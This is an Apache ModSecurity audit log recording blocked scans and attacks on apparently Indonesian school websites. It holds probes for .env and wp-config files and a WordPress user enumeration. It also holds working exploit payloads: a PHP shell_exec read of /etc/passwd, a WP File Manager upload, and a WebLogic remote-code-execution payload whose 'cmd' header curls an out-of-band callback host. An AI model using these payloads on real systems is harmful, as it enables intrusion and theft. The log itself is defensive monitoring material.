Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3883441-Z-- --932d883d-A-- [21/May/2025:14:27:28 +0700] aC2AYIv3pT1iV0OxjLTowAAAAJg 103.236.140.4 42634 103.236.140.4 8181 --932d883d-B-- GET /wp-config.php.save.10 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.100.85.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.100.85.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Accept: */* --932d883d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --932d883d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812448638350 652 (- - -) Stopwatch2: 1747812448638350 652; combined=244, p1=217, p2=0, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --932d883d-Z-- --fab9fc20-A-- [21/May/2025:14:32:01 +0700] aC2BcYv3pT1iV0OxjLTowQAAAJY 103.236.140.4 42636 103.236.140.4 8181 --fab9fc20-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G955F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --fab9fc20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fab9fc20-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747812721447031 779 (- - -) Stopwatch2: 1747812721447031 779; combined=324, p1=292, p2=0, p3=0, p4=0, p5=32, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fab9fc20-Z-- --8f11f942-A-- [21/May/2025:14:53:49 +0700] aC2GjSioYDAgD0WHUjSnngAAAE8 103.236.140.4 42722 103.236.140.4 8181 --8f11f942-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --8f11f942-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f11f942-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747814029781622 883 (- - -) Stopwatch2: 1747814029781622 883; combined=336, p1=294, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f11f942-Z-- --de7ad441-A-- [21/May/2025:14:55:33 +0700] aC2G9SioYDAgD0WHUjSnowAAAFU 103.236.140.4 42738 103.236.140.4 8181 --de7ad441-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 140 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 167545899 --de7ad441-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --de7ad441-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de7ad441-E-- --de7ad441-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747814133155366 1932 (- - -) Stopwatch2: 1747814133155366 1932; combined=668, p1=457, p2=181, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de7ad441-Z-- --fa68d44b-A-- [21/May/2025:14:55:33 +0700] aC2G9Rpv_mIXt2pDBOoHkgAAANc 103.236.140.4 42764 103.236.140.4 8181 --fa68d44b-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 608 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 160557818 --fa68d44b-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --fa68d44b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa68d44b-E-- --fa68d44b-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. 
[file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747814133188754 3705 (- - -) Stopwatch2: 1747814133188754 3705; combined=2419, p1=359, p2=2034, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa68d44b-Z-- --54026943-A-- [21/May/2025:14:55:33 +0700] aC2G9Rpv_mIXt2pDBOoHkwAAAMM 103.236.140.4 42768 103.236.140.4 8181 --54026943-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1258 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0mbkqa4kqtm561jt3n063p17ouzafke6.oast.fun X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164788833 --54026943-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = 
(weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --54026943-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54026943-E-- --54026943-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747814133194242 1817 (- - -) Stopwatch2: 1747814133194242 1817; combined=698, p1=347, p2=325, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54026943-Z-- --03ca7c3c-A-- [21/May/2025:14:55:33 +0700] aC2G9Rpv_mIXt2pDBOoHlAAAAMI 103.236.140.4 42776 103.236.140.4 8181 --03ca7c3c-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 6 User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Content-Type: x-application/hessian X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164788836 --03ca7c3c-C-- cH --03ca7c3c-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --03ca7c3c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747814133199111 3279 (- - -) Stopwatch2: 1747814133199111 3279; combined=2195, p1=463, p2=1658, p3=23, p4=26, p5=25, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03ca7c3c-Z-- --f3cdad48-A-- [21/May/2025:15:08:55 +0700] aC2KF3ZGSt58M5vv3glzDgAAABY 103.236.140.4 43432 103.236.140.4 8181 --f3cdad48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Safari/605.1.15 Accept-Charset: utf-8 --f3cdad48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3cdad48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747814935030962 791 (- - -) Stopwatch2: 1747814935030962 791; combined=348, p1=308, p2=0, p3=0, p4=0, p5=40, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3cdad48-Z-- --58064f4c-A-- [21/May/2025:15:26:42 +0700] aC2OQnZGSt58M5vv3gmBsAAAABA 103.236.140.4 44496 103.236.140.4 8181 --58064f4c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 179.191.157.250 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 179.191.157.250 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --58064f4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58064f4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747816002625188 2677 (- - -) Stopwatch2: 1747816002625188 2677; combined=1157, p1=375, p2=756, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58064f4c-Z-- --47258661-A-- [21/May/2025:15:30:00 +0700] aC2PCCioYDAgD0WHUjS23gAAAEI 103.236.140.4 46920 103.236.140.4 8181 --47258661-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.69.144.155 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.69.144.155 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --47258661-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47258661-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747816200515450 3244 (- - -) Stopwatch2: 1747816200515450 3244; combined=1479, p1=484, p2=965, p3=0, p4=0, p5=30, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47258661-Z-- --c42b8352-A-- [21/May/2025:16:01:11 +0700] aC2WVyioYDAgD0WHUjTAcQAAAE4 103.236.140.4 41334 103.236.140.4 8181 --c42b8352-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --c42b8352-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c42b8352-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747818071360277 654 (- - -) Stopwatch2: 1747818071360277 654; combined=242, p1=210, p2=0, p3=0, p4=0, p5=32, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c42b8352-Z-- --f60dd16b-A-- [21/May/2025:16:01:16 +0700] aC2WXBpv_mIXt2pDBOojJAAAAMs 103.236.140.4 41426 103.236.140.4 8181 --f60dd16b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept-Charset: utf-8 --f60dd16b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f60dd16b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747818076738679 802 (- - -) Stopwatch2: 1747818076738679 802; combined=301, p1=266, p2=0, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f60dd16b-Z-- --5e4aad32-A-- [21/May/2025:16:41:11 +0700] aC2ft4v3pT1iV0OxjLQRMQAAAIQ 103.236.140.4 44002 103.236.140.4 8181 --5e4aad32-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 91.206.169.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 91.206.169.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ANE-LX3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --5e4aad32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e4aad32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747820471940161 1020 (- - -) Stopwatch2: 1747820471940161 1020; combined=393, p1=341, p2=0, p3=0, p4=0, p5=52, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e4aad32-Z-- --9da22e2d-A-- [21/May/2025:16:41:33 +0700] aC2fzXZGSt58M5vv3gmekwAAAAw 103.236.140.4 44274 103.236.140.4 8181 --9da22e2d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; INE-LX2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --9da22e2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9da22e2d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747820493112820 842 (- - -) Stopwatch2: 1747820493112820 842; combined=378, p1=344, p2=0, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9da22e2d-Z-- --8f1d0667-A-- [21/May/2025:16:43:33 +0700] aC2gRYv3pT1iV0OxjLQR0AAAAIc 103.236.140.4 45724 103.236.140.4 8181 --8f1d0667-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15 Accept-Charset: utf-8 --8f1d0667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f1d0667-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747820613962618 636 (- - -) Stopwatch2: 1747820613962618 636; combined=261, p1=215, p2=0, p3=0, p4=0, p5=46, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f1d0667-Z-- --a7761356-A-- [21/May/2025:16:47:19 +0700] aC2hJ4v3pT1iV0OxjLQS3AAAAIQ 103.236.140.4 48428 103.236.140.4 8181 --a7761356-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.132.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.132.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a7761356-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7761356-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747820839070667 2910 (- - -) Stopwatch2: 1747820839070667 2910; combined=1254, p1=412, p2=810, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
